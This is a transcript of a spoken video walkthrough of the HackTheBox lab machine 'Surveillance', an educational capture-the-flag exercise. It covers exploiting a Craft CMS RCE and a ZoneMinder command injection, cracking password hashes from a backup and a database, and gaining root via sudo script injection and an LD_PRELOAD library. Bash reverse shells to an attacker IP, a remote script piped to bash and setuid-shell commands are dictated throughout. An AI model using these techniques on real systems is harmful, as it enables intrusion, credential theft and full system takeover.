What's going on YouTube? This is Ipsec doing surveillance from HackTheBox, which at the time of release was a much more challenging box than it is today. Because there are two parts of the box, one when exploiting Craft CMS and the other when exploiting ZoneMinder, that you knew is vulnerable because it had a CVE or security bulletin put out on the version, but there weren't many good public POC scripts to just exploit it. So it had a lot more research that you had to do right when the box got released, but now there's some good POC scripts out to exploit these pieces of software. It starts off with exploiting Craft CMS. You get a shell on the box. You look at a backup. You get a hash that lets you gain access to ZoneMinder. But if you didn't find that hash in the backup file, you could also read ZoneMinder's config, gain access to the ZoneMinder's database, and reset the password there and log in. So there's two different ways you gain access to ZoneMinder. And if that isn't enough, there's also a unauthenticated exploit in ZoneMinder, so you don't even need to gain access to it. Once you get access to that service, you can exploit it, get a shell, and then exploit a sudo rule two different ways. So with that being said, let's just jump in. As always, we're going to start off with the nmap. So -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it surveillance, and then the IP address of 10.10.11.245. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Nginx, also running on Ubuntu, and that all the requests are getting directed to surveillance.htb. So let's go ahead and add this to our host file. So sudo v etc host, and then we can add 10.10.11.245 surveillance.htb, save that. And let's take a look at the website. So I'm going to go to surveillance.htb, and it looks like it is just a home security website. I always like identifying what the how the website's powered by and like what it's running. You could try looking at the source, but my first go-to normally is Wappalyzer, and it's telling me that it is Craft CMS, also says it's running on Ubuntu, has a bunch of other libraries. But Craft CMS is a PHP thing. It's just a content management system. And if we go to the very bottom, we can see that Craft CMS does tell us which version is running, which is 4.4.14. So I'm going to go to exploit.db and type in Craft CMS. And we see there is an exploit. The date this was uploaded was March 25th. But the CVE date, it looks like it is December 26th of 2023. So if we Google this CVE, it goes to this GitHub page. And this GitHub page does have acknowledgements. I don't think this exploit script did. We have a few references, I guess. We have two, that blog caliph.io, and it looks like the GitHub security advisory. There's just a few more on this page. And this script actually has a bug in it. We'll go over that in a minute. But this one on GitHub works just fine. So let's just go take a look at all the acknowledgments so we can understand what is going on here. The GitHub security advisory doesn't have that much information. Oddly enough, it says refresh your security key. I don't know exactly what this is, but it's probably just used for like signing cookies or doing something like that. And I'm guessing since this is a website exposed to the internet, someone is probably exploiting a bunch of these, extracting the Craft security key, and then deciding if they want to attack them later, right? So here is the blog post that goes over most of the detail. I'm not going to talk about this in depth because we're just going to go over the exploit script and probably just rehash a lot of things that are said here. The key thing is we have some type of control over object creation in PHP, right? And they're doing the load from file function. And then right here in recommendations, they also recommend updating Craft security key. They confirm that knowing the key will lead to unauthenticated RCE. So definitely whenever you have like WordPress, Craft, Laravel, whenever there's a big compromise in your web application, make sure you update all the secrets to your web app, just because those can be used for persistence. This is a gist of an exploit script, so it's a different exploit script it looks like. This is a Metasploit module for it. I'm not going to be going over the Metasploit module, but if you wanted to use Metasploit, it looks like you can. And then this is just a Qualsys thing talking about the exploit as well. Here they're showing that you can run PHP info. So with all that said, let's go over the exploit. And I'm going to pick this one. It has a bug in it, but let's talk about that bug. So let's use set paste it in. So let's see. We start off by just making sure we have arguments. Then we're going to make sure it begins with HTTP. And then right here is where we're sending the PHP info request. And this is very similar to, I already closed it, but the Qualsys post, right? Where was it? I don't even have it open at all. Let's go here. Right, the request here is pretty much this. We have the guzzle PSR7 FN stream PHP info, and that's what we see here. So we're just mimicking that request to send PHP info. We don't need to do this, but this just guarantees our exploit works. It removes a lot of the guesswork from it. So right here, PHP group exists in the output of PHP info. So they're just making sure the command did run. And here, they're going to extract two pieces of information. They want the upload temp directory. So in PHP, whenever you start uploading a file, it writes in the temp directory. And if the upload was legitimate, then it moves it to where it's supposed to go. So this is definitely going to be useful because it's where the PHP temporary files are. They're called like PHP, then I think a random 5 characters. The second piece is we want to know where the server's document root is. This is just where the web server exists. Is it in like var HTML? Is it in var surveillance.hdb? We don't know exactly where it exists on the server. So PHP info tells us. So we get both of those. We're making sure that we did indeed extract the temporary directory, and we print out them. And now we're going to create a shell. And this is interesting. This exploit is very similar to if we went to ipsec-rocks, type like PHP image, this one, PHP object instantiations. Because we're using the ImageMagick library here, it's going to give us a piece of the chain that's typically hard to do. So generally when you upload a PHP file, the temporary directory, it has a random name. And PHP doesn't really support wildcards. So if I wanted to include that random file that I just uploaded, I'd have to know /temp/php GEA7B or something like that. If I don't, then I have to brute force it. And that temporary directory only exists for a short amount of time. So there's two exploits at play. And I talk about them both in the intentions video. Also, if we just did like PT swarm object instantiation, it talks about that at the end of this article. So this is another good read if you wanted to. I also go over it in the intentions video. Let's see if we can find it real quick. Right here, they're talking about the MSL format. Let's see. Yeah, right here is where they talk about inducing the crash. So normally the PHP temporary file only exists for a short amount of time, like 2 seconds. So you can't really brute force the PHP name in that amount of time. However, this construct, we're trying to make an image essentially from Etsy past WD, it crashes. And it crashes before it can clean up that file. So what this does, it's going to leave this PHP temporary file, which will have the contents of this around until someone manually cleans it up, or maybe the server reboots, right? And the bug is actually right here in the script. This MSL file, when you do these brackets inside of the caption, you need to use entity encoding to encode these. So that's where the bug is. So we drop this MSL file. And what this allows us to do is create a file in shell.php. And the reason why we do it this way is because the next request that we're going to make is going to load MSL, And when we have a ImageMagick vid MSL thing, we can now use a wildcard. So that's what's enabling us to go into /temp/php. We do the wildcard and we get the first file it hits. Now, if you ran this exploit and you had like PHP 0, it's going to make winning future race very hard because that file is not going to get cleaned up. It's just going to sit there. And then every time this runs, it's going to be running against your old temp file, right? So if you have issues, definitely like revert the box, because if you get unlucky and a bad payload gets in very, very early, it can definitely screw things up. So what that does is it loads the file, which will take in this, which is just PHP system, and write it to shell.php. And that is it. So I'm going to save this. I'm going to run it and hope I don't get a super low PHP temp file. So if we just do Python 3 exploit.py, we need to do HTTP surveillance.htb. It's going to say everything works, enjoy our shell, but we get 404. So if I went over to this GitHub, this is where we just Googled the CVE number. I go to this, the exploit looks very, very similar. So I'll just call this exploit2.py. Right, this is looking very identical to what we did. So I was like, what's different between these two? So you can just run a diff against it. And it shows us that one is doing entity encoding here, right? So let's try running exploit2. Let's do Python 3, exploit2, and then ID, and it runs. So if I go to temp now, we can see there's two PHP files. One of these is from the exploit that did not work, and one that is from that did work. I'm guessing this is the one that did work because I think it does alphabetical. So let's cat this. We have to cat /temp, then this, and we can see, yes, this has the HTML ND encoding. And then here's the one that did not. So if we cat temp and this, that does not. So when it reads this MSL file, when I say it, I mean ImageMagick, this is valid XML, and it processes the request. It reads the caption, which is a PHP shell, and writes it to the root directory. When it reads this one, it fails because I don't think this is valid XML having the open and close brackets like this and the double quote. And so it fails on this read line, and then it can't move over to the right. So yeah, let's just now get a regular reverse shell. So I'll do nc lvmp 9001, and then bash-c bash-i dev tcp 10.10.14.8 9001 0 and 1 like that. And we get a shell. So let's upgrade the pty y.spawn bin bash sty raw minus echo foreground export term is equal to x term. Okay, so now we have a shell on surveillance. So the first thing I like doing is just going into the database and grabbing all the passwords. I'm going to check web.config to see if there's any type of password here. It does not look like there is. Is there any files? It's probably going to be in config. Let's see. grep-r password. Nothing here. I'm going to find anything. Maybe it's database.php. db.php is another one. I don't think that's going to be it. Let's see. Config. Is there a project? Project YAML. Site. Where is the PHP config? Find.grep config. A lot of files. So at this point, I'm going to go over to Google, and we're just going to Google how to change the Craft CMS database password. reset password with MySQL, craft users. That's not it. In the database, I don't think this is it either. This is updating a user's password. Database connection settings. Let's see. Config db.php. Oh, .env. Environment file. LSLA. There we go. .env. So we have a password right here. Craft CMS password 2023. So we can do MySQL-u craft user -p, enter this password, show databases, use craft db, show tables, describe users, and let's just say select. Is there a username? Let's do email password from users. There we go. And we have the admin set to this password. So let's go and try this out. Let's go over to the Kraken. Let's go in hashcat. Hashes surveillance.craft. Paste this. Let's put the username beforehand. And let's do hashcat. I think it's --user. Hashes surveillance.craft. Opt word list rocku.txt. It's probably like users or username. Sometimes I get that flag wrong. We have to specify mode 3200. And let's make sure it starts, and then we'll go on and look at other things. I always like saying it start cracking. There we go. Okay. So we've started exfilling the database. We could go like in storage, and then there's backups here. And Linpeas is actually going to show this as well. So if we ran Linpeas, we would see this file, but let's copy this file over like dev shm. And, I typed it twice. Let's unzip it. And then we also have the SQL here. So if we less this back up, we just have straight SQL commands. So what I'm going to do is grep for insert on that command, because insert is going to show me every command that is being entered. And I'm going to do less -S. So we have like the lines, and we have to fix a terminal size. So let's do stty-a rows 28 columns 110. stty rows 28 columns 110. Was it 110? Yep. Okay. Let's do that less command again. That's not what I expect. 28, 110. Okay. The less still looked a little funny to me, but we'll make do. So let's see. We're doing insert into. We probably want to look at insert into users. And we have this row right here. And on here, it's only a hash. It's not using bcrypt. Bcrypt is like that $2y $14. 14 was the iteration count. This is just a straight hash. So let's grab this. I'm going to grep Matthew is what I think it had in it. And maybe we can do a -i. There we go. So insert into users, Matthew, and we get this hash. So we want to see exactly what this hash is. So I'm going to do echo -n, And then I'm going to do wc-c for show me character count. And I think that's a SHA-1 sum. I'm just going to echo some junk to SHA-1 sum. Let's awk print the first thing, wc-c. That's not it. Maybe it's SHA-256. Yep. The 65 is because there's a line break here. So this is a SHA-256 sum, and this is much quicker to crack than this will be, right? This says it's going to take quite some time. It's not even at 1%, 11 hours. So let's cancel that. And we could probably even just Google this hash because there's no salt, right? It's not unique. It's just a straight SHA-256 sum. But let's just go with this. Surveillance.SHA-256. Paste it. And then let's do the same thing, except with the SHA. And this will go blazingly fast. We can get rid of the -- user. It's probably going to have a few options. So it's probably going to be just straight SHA-256. And it cracked instantly. And the password is StarCraft122490. So I'm guessing that's a birthday. Because I think StarCraft came out in 98, if I remember correctly. So definitely not the release of StarCraft, which is a video game. So if we go back to our shell, if we cat etc pass wd, we have the Matthew user. So we could try SSH, Matthew at 10.10.11.245. Paste in the password. And we get logged in. So that is one way to get to this point. There is another way we could do. Let's go to show that real quick. So that is just running Linpeas. So if we ran Linpeas, let's show us see what that would show. So I'm going to copy opt peas Linpeas to here. Let's make a directory www. Move it there. And then start up a web server. And then curl 10.10.11 10.10.14 8 8000 linpeas.sh. Pipe over to bash. And I'm going to pause the video, let this run, and we'll come back when it's done. Okay, now that Linpeas is done, we could search the output for like a zip, and we see it says it's under the readable files, and we have the backup right there. But what's more interesting is it also finds a different password. This is the ZoneMinder password 2023. So let's see. I don't know. It's not telling me where it found this password, actually. Let's search the output. There we go. Backup manager files. We have it showing right here. User shares ZoneMinder www API config database. So we have another database password. So let's try connecting there, right? Let's go here. MySQL -u. What was the username? Database is ZM. It did not say the username. Let's just cat this file. Okay, so username is ZM user. So we can do MySQL -u ZM user -p. Copy this, paste it, show tables, show databases, use ZM, show tables, select star from users. Let's just do a /g to do a pretty print. And we have another hash. This hash is actually the StarCraft one, but it still takes a while to crack because it's bcrypt. But you could do it that way as well, right? And then if we, I realize it's probably confusing. ZoneMinder is going to be the next step, and we have to learn how to log into ZoneMinder. So you can either log in if you find out Matthew's password and then just guess admin is the username that password goes to, or you can do it through the database and update this field, which we'll do in a minute. But first, we have to figure out ZoneMinder is running, right? If we do an SSLNTP, we see port 8080. So let's do, to pop up that command, if the first thing you type on a SSH line is the squiggly C, it's going to open up this secret prompt. And we can just do -L to start the port forward. 8080 is listening on burp suite on my local host, so I'm going to change it to 8081. Then we can do 127.0.0.1, port 8080. So now my local host is listening on 127.0.0.1, and then all traffic's going through SSH and ending up here. So if I go to 127.0.0.1, 8081, we get ZoneMinder. So we could just know admin and then that StarCraft password. Where was it? Right here. That lets us log in. But if we didn't have that password, because we have access to the database, we could just update the database, right? If I just Google like bcrypt generator, that'll probably do it, right? Yep, right here. Let's just say we want password. So we have a bcrypt 2a. I think the format was 2y, but it's not going to matter. So we can just now do, let's see. Whenever I do an update command, I always do a select first. So I'll do select password from users where ID is equal to 1. Okay, I have validated. I'm only going to update one record. Updates always scare me in databases. There's been so many times like I feared I just ran an update command and updated like every field. So always get in the habit of doing a select first. So I'm going to do update the users table. I'm going to set password equal to this. And then where ID is equal to 1. I just erased that. Update users set password equal that, where ID is equal to 1. And one row changed. If there were multiple users and you just ran this command, you now just updated every single password in the database. So that's why I always try to like take as much caution as possible when updating the password. So now if we go back to the console, I think it's going to log us out. It did not. Let's just do new private window. Go here. And I can now log in with admin and password. That's copied. Is that what I typed? Password. That should be. Admin. Password. Okay. I think there's a cron that's running on a schedule that resets this password, right? But that's how you can get into ZoneMinder. And this is actually kind of irrelevant because when the box was released, we only had a CVE to go off and not an actual exploit. I'm going to go into looking for an exploit manually at the end of the video. The easy one to find with a known CVE when this box was released required authentication. But since the box got released, this application no longer required authentication for the exploit. So if we just went back to exploit DB, typed ZoneMinder, there we go. We got an unauthenticated RCE. And let's see. I'm just going to send this one to Python so we can examine it. So let's do v zm.py, I'll call it, set paste. Paste this in. Request. Okay, so first we fetch the CSRF token. I don't really care about that one. Execute command is what I want. So I'm going to do proxies is equal to HTTP, then HTTP 127.0.0.1.80.80. So this is another way you can just quickly analyze what a Python exploit is doing, right? We're just going to send this to Burp Suite, and now we don't have to read code. So let's do Python 3, zm.py. We need the target IP, which is going to be 127.0.0.1.80.81. And then it wants a reverse shell, so we'll do that and 9001. Okay. Let's set Burp Suite to intercept. No connections. We probably have to specify HTTP. There we go. And this is what the payload looks like. We send view snapshot action create monitor IDs. If we look at this URL code, that's all that looks like. Oh God. There we go. And then how do we send the shell? It's just straight command execution or injection, right? We put a semicolon in and then do this base 64, which will decode to the reverse shell payload. So that's all that exploit is. If we forward it, it works. So that's how we get on as ZoneMinder. And if we did a sudo-l, we can see ZoneMinder can run ZoneMinder scripts as root. And there's two ways we can exploit this. The first one is going to be finding a exploit within the ZoneMinder Perl scripts. And that's the one I'm going to start with. Before I do that, is there like a SSH key I can grab? Let's see, make dir.ssh. Let's just make sure, let's see, etsy passwd grep ZoneMinder. ZoneMinder. It has bash. Also, I'm curious real quick. ZoneMinder. Is this the password for ZoneMinder? Let's do su-ZoneMinder. It is not. Okay, good. So now let's just drop a key. So we'll do sh keygen -f. We'll call it ZoneMinder. Cat ZoneMinder.pub. Let's grab this. Echo authorized keys. Okay. So now we have better shell. We didn't have to do that. It's just nice with syntax highlighting. So we can go user bin and let's see, we can execute any of the ZM scripts with sudo. So looking at these scripts, there's one that really stands out to my eye that I would touch first. And that's going to be the ZMUPDATE, because this update means we're going to be doing something, right? So if we look at ZMUPDATE, let's see what it actually does. So we have a check, freshen. We can specify a database user, database password, force a upgrade to the current version. So let's see exactly how this works. So get options, connect. We're assigning the DB user and DB pass. See, this is still just making sure our arg parsing is fine. Let's see, update check proxy. So that's getting the latest version. This is running some SQL commands to get which version we're running at. See, this is doing some type of select. So So this is not a good way to view this file. I'm trying to think of a better way to search. What I did was looked at user input. So we had DB user. So let's just look at DB user. And I want to track where this goes to. Maybe /user would be a better one. Okay, user is DB user like that. Okay, let's see. And right here, this should stick out because MySQL dump is a command line binary. We're doing a space and then passing in an argument, and then a space, passing in a user, a space, passing in a password. What do you think is happening here? It's passing it over to bash to be executed. So right off the bat, we can probably just do a command injection into the username. So that's generally how I find vulnerabilities quickly. Like the first thing I do, I don't go like read the script top to bottom. I look for user input and then trace where it's being used, because that is going to be the most likelihood for like a command injection vulnerability. So let's now test this out. So we can do sudo user bin ZMUPDATE.pl. I'll do -h. Let's see. We probably need -v for version maybe. Let's do v1. So we're going to try to upgrade to version 1. -u. Let's do the username of IPsec, and then we'll do a reverse shell. So bash-c. Let's do this in base 64 so we don't have to use any quotes. V shell bash-c. We don't even need bash-c. Bash-i. Dev TCP 10.10.14.8 9001 0 and 1 like that. Okay, base 64-w shell w0. Okay, so we can grab this. So we can do echo base 64-d bash-i. So that's our new username. -p we'll say does not matter, because I don't think it does, because we just need to get it to run that MySQL dump command. Let's see what happens real quick. There's an error. Unknown option, v1. Is it v space 1? Okay. You have specified to upgrade to version 1. Sure. Database backup. Yes, we definitely want to back up. And let's see. Here was the command we ran, and we did not get code execution. Let's see. MySQL dump u IPsec. I wonder if we can't do pipes. Which bash cp user bin bash to temp. Let's try this. So we'll do IPsec and then chmod 4755. So we're going to make this set UID temp bash. That did not work either. Let's see. Wonder if it's because we're putting it in those quotes. We'll switch up the quote. Still nothing. One thing I like doing whenever doing this is also putting a semicolon at the end. So just in case like it's trying to add things to the end of this, it works. Because what may have just happened is, actually, talking through this, I think I know what happened. It did MySQL dump IPsec, and then we terminated the command. We started running chmod, but we didn't terminate the command again. So we put all these arguments on that chmod, which made it not work. So by doing this, I think it's going to work now. Right? Because this was one command, this was another command, and then this command. So if we do lsla temp bash, there we go. So we can do temp bash -i. We're not root, but that's probably because if we go to the mount and let's grep on temp, let's see, temp fs, no set UID. So we can't do it on temp. Can't do it on dev as well. So we could just do it in our home directory, I guess. So let's, or we don't even, I guess we can. We'll do it in our home directory, then we'll get a shell, and then we'll show a different way to do this. So let's copy bash to our home directory. And our home directory, cd pwd is ZoneMinder. Okay, where is this? chmod. And we could also just do it to user bin, but I always hate doing that just because I want to delete bash as soon as I do this. It's easier to delete bash than reset the permission. Just better habit, I guess. Because any other exploit that was running bash, maybe someone just did a bash reverse shell, they may just auto-escalate to root if you do the base bash in the system. If you move it, then there's less chance of that happening. It's still not good to do to a system because you're definitely weakening its security, but oh, we got to change the username too. We can do chmod. Let's do chown root. We didn't specify the binary. Home ZoneMinder bash. There we go. So now if we do bash -i, it's bash -p, isn't it? There we go. We are now root. So that is one way we could do it. But there's another thing that we could do, and it does require logging into ZoneMinder. I guess we could do it from the database, but it is pretty interesting, so definitely going to show it. If we do admin, and then the password is that StarCraft one, I should really save all these passwords in some file in case I have trouble finding them. But we can log in here, and if we go to the options, there is a really odd one. Let's see. Where is that? Auth type, case insensitive. I think it's on this page. Nope. Let's see. Oh, config. So it's on the screen right now. LD preload. It's a path to a library to like run a file. I know I've covered this on ipsec.rocks plenty of times. If we do LD preload, you could also look at one of those videos, but we can inject that, right? So what all the Perl scripts are apparently doing is taking an LD preload from this and running it, right? Normally, we can't exploit this with sudo, because if we do sudo-l, we have an environment reset. So we can't set the LD preload variable. But since the scripts are reading from the database LD preload and then running that binary, it enables us to smuggle in LD preload. GCC does exist, so let's just make main.c. And now all we have to do is create a program. Let's include the standard lib, and then we can do the init function. And this is what gets called on LD preload. So the first thing we want to do is unset the environment LD preload, because if we don't do that and then we run a system command with another dynamically linked binary, we're going to go in like this infinite loop of just keep calling LD preload, right? We don't want to preload ourselves. So we unset the environment, and then let's just call, we'll do bin bash, like that. And then we want to compile it. So we'll do GCC -shared, so it's a library. And then the name of the program, we'll call this exploit. And we also want to say no start files, because by default, the compiler is going to try to add that init function, right? So the no start files tells it not to. So now that we have our LD preload binary, let us add it here. So this is going to be home ZoneMinder, and then exploit. And then we save it. And then let's just do one of those sudos. Sudo-L, I guess, ls, where is it? User bin zm star sudo. Where is the command? User bin, like this. Wonder if we just do zmore. We have to give a thing. Password for ZoneMinder. That's saying no password. Oh, we have to do .pl. And then some type of argument. Sudo user bin zm. Oh, zmore doesn't have pl. Let's just do the update again. ZMUPDATE .pl dash v1 dash u lol dash p thanks. And I didn't close out that lol. Let's see. Continue. That did not work. Is this still set? Did it revert on us? LD preload is not set. Let's try this again. And save. That did not work. MySQL should have definitely been. Let's see. The file still exists. Let's see. cd user bin grep-r I ld preload star.pl. Maybe it's only the zmdc command, right? Because looking at it, we only have it here. So let's do this one. zmdc.pl command. So we'll do status. Open VM tools. I'm just doing like a server that generally exists. Or a service. Fail to connect to servlet socket. So did this get deleted? It did. Save. It's there. Unable. Start, stop, restart. ZoneMinder. Let's see. Find /-name zmdc.sock. I wonder if there's a different one. There is not. Let's try instead of status. Let's do startup. Was it? There we go. Starting server. I would expect this is where the preload happens. Let's see. The ZMDC one. Okay. Let's check this out. LD preload is still set. So I wonder if it's not interactive. Because I'm thinking we're doing it right. We can try -h. Let's see. Start. That's weird. Startup did something different than start. Want to start, check. So invalid daemon. So we need to know what a daemon is. And I actually haven't exploited this one before. I was just told that LD preload existed, and I thought it'd be easy. Apparently not. Okay. So here it's listing the daemons. Invalid. The command is startup shut. I think the help is wrong. Oh no, one of the startup shutdown status or start stop. Okay. Okay, that makes sense. So before it hung, now it didn't. Like if I save this, because I'm guessing if we refresh, this LD preload doesn't exist. So if I save, and then we run this again, we probably have to do shutdown. But it took me a while to run that command. Right? Before it was instant. Now it's hanging. So I'm guessing here we actually ran bash, but for some reason it didn't give us a interactive shell. So let's go back to our home real quick. And let's do main.c. And instead of this, we'll do system, which, let's see. We'll copy user bin bash to please sub. So this is bash. I renamed it because I want to make sure it's not this. So let's do the chown and whatnot. Okay, so we have this. Or let's send a reverse shell. That'll work, I think. System bin bash -c bash-i dev tcp 10.10.14.8 9001 0 and 1 like that. I think this will work. GCC. We want to do the shutdown command, the start up command. And before we do that, I just want to save to make sure LD preload is set. There we go. We got a connection, but no shell. Unset env. That's weird. I wonder if it's something with like the LD preload happening. Because, oh, yeah, that's what happened. We LD preloaded ourselves, I think. I think we unset it here, but when we instantiated bash, it ran it again. So I think that's what happened there, and that's why the shell hung and we never got a shell. So let's just do what we were going to do, and that is chown chmod. So let's do chown user bin. So user bin chown root home ZoneMinder. I think I called it please sub. And then we want to do chmod 4755. There we go. Okay. Let's make this. We don't need that. We probably want to do the shutdown command and start up. It's there. Save. run, starting server, LSLA, now please sub, has those bits set. So that is the other way we could do the privesc, right? Now we're root. So before we end the video, let's just talk a little bit about the second way to get code execution on this. Because like I said, when this box was released, there were CVEs against ZoneMinder, but no actual public POC, like proof of concept. So when the box was released, it was much harder because there wasn't that unauthenticated exploit. So let's take a look at that. By going to ZoneMinder's GitHub, so we just do ZoneMinder GitHub, and then looking at the security issues, we'll find one that has some information about it. And then we have to piece together the actual proof of concept. So let's look here, SQL. This came after the box was released, or maybe it didn't. They're both somewhat recent, right? But if we look at the command injection here, this was the intended way to do the box. Command injection in daemon control here. Any authenticated user can construct an API command to execute any shell command as the web user. And then they apply the fix. So if we look at the fix, it shows what's changed. Let's see. Let's do split view. And it was in this daemon check. So if we want to look at this file, how do I view just the file? Ignore white space. There should be a way to just view the file, right? View file. There we go. This one is the patch, because if we looked back, they added a lot of this stuff, right? So to try to prevent here. So they added all of that. But if we look at what they added, it's just a regular expression. Let's actually just look at the exploit first. It's easier to explain that. Let's see. Browse file. Then what was that file? It was web API, web API, app, controller. Where's host controller? Host, there it is. This is still the patch version. Let's go back here. Oh my God, web, API, app, controller, host. There we go. This is what the function was. So if we hit daemon check, it's going to build our executable. So ZM path bin. So that's going to be user bin. And then ZMDCPL check. And then if daemon exists, it's going to append to that string space daemon. Then if args exists, space args. And then it's just going to call exec. So this is just a bash command, right? So all we have to do is input some characters. So if it's a bash command and we inputted like this, who am I? It would execute. If we did who am I like this, it executes, right? We could also do the semicolon. Like we just have straight bash here. So that is going to be the exploit. We have to figure out how to get to daemon check. We see how it's controlled. We have to make an API request here. But in order to make an API request, we have to figure out how to talk with the API, right? Because if we just tried this, let's just start it off real quick. Curl x, is x proxy? I'll just do it in repeater. Let's go here. I'm not intercepting. There we go. Okay. So this makes it easy to visualize the request. So where we want to send to is this endpoint. Okay. The daemon.pl, I don't know exactly what we put here. Maybe ZMDC and the command test.json. Okay, if we send this, we get not found. I don't think we need the ZM. There we go. We get result nothing. I wonder if I get rid of my cookie, not authenticated. Wait, am I talking to API with this? I thought I would need like a session token. Sleep 1 second. That's it. That's all you have to do. So you just need an authentication here. You don't need to like do any special like API login. Sometimes you have to like request a JWT in order to talk to APIs, but this looks like it takes ZM session ID just fine. So we could just put our shell here. --I dev TCP 10.10.14.8 9001 0 and 1 like that. I think there's gonna be some URL encoding problems here. Let's see. Yeah, there are. Wonder if I URL encode all characters. Let's see. Convert selection, URL, all. Nothing. Let's see. Curl 10.10.14.8 9001. Too few arguments. Because we have to do a plus. Where is curl? User bin. I thought this would hit us. So maybe we aren't getting code execution. Why did sleep work? That's 1 second. That's 2 seconds. So we definitely have code execution. Let's just get rid of all the possible bad characters. Let's do, I still have my shell file, right? Yep. So let's see, we have that. I do base64-w0 shell. We need to add a space right here. Let's add a watch-n1. Okay. So we need to get rid of the space. Okay. That watch command just runs that command every second, right? So that just lets me quickly switch this. So I can see now that is pure alphanumeric. So I should be able to grab this NC LVNP 9001 and do echo this, then base64-d bash. And since this is URL, like not an actual parameter, I think we have to do %20. I don't think pluses work. I think that worked. Yep, we have the shell. So it was some weird bad character there. Maybe it was the colon. Maybe the colon was bad. So that works. Let's test if the colon is the bad character. So if I just do curl 10, 10, 14, 8, 9001, %20, that errors. Escape. Okay. So do I need HTTP? Cake PHP. Why did I? That is, I did not expect to see that error. Well, Cake PHP, I guess, runs ZoneMinder. I guess the web server's PHP, not Perl. That makes somewhat sense. So we did that curl. I'm guessing it has to be colon as a bad character. NC ZV 10, 10, 14, 8. We can do %20, %20, %20. There we go. It connected. So there is definitely a bad character there that was unintuitive, probably colon, but we tested it with NC and that worked just fine. Let's see. Curl 10, 10, 14, 8, 9001. That works. So if I do sudo and we test, and I don't know why you're still watching the video. This is just me, what I normally do after a box to try to understand how things fail, right? Okay. Yep. So I've never really ran into the colon being the bad character, but it was, and I don't know why. And it doesn't look like URL encoding solves that issue. Maybe it uses colon like as a separator. Like maybe it's doing daemon colon arg like that. So me doing an argument like breaks the split command. That's all I can think of right now. But we learned. We figured out exactly how to troubleshoot that issue, right? So that is going to be the box. Hope you guys enjoyed it. Take care, and I'll see you all next time.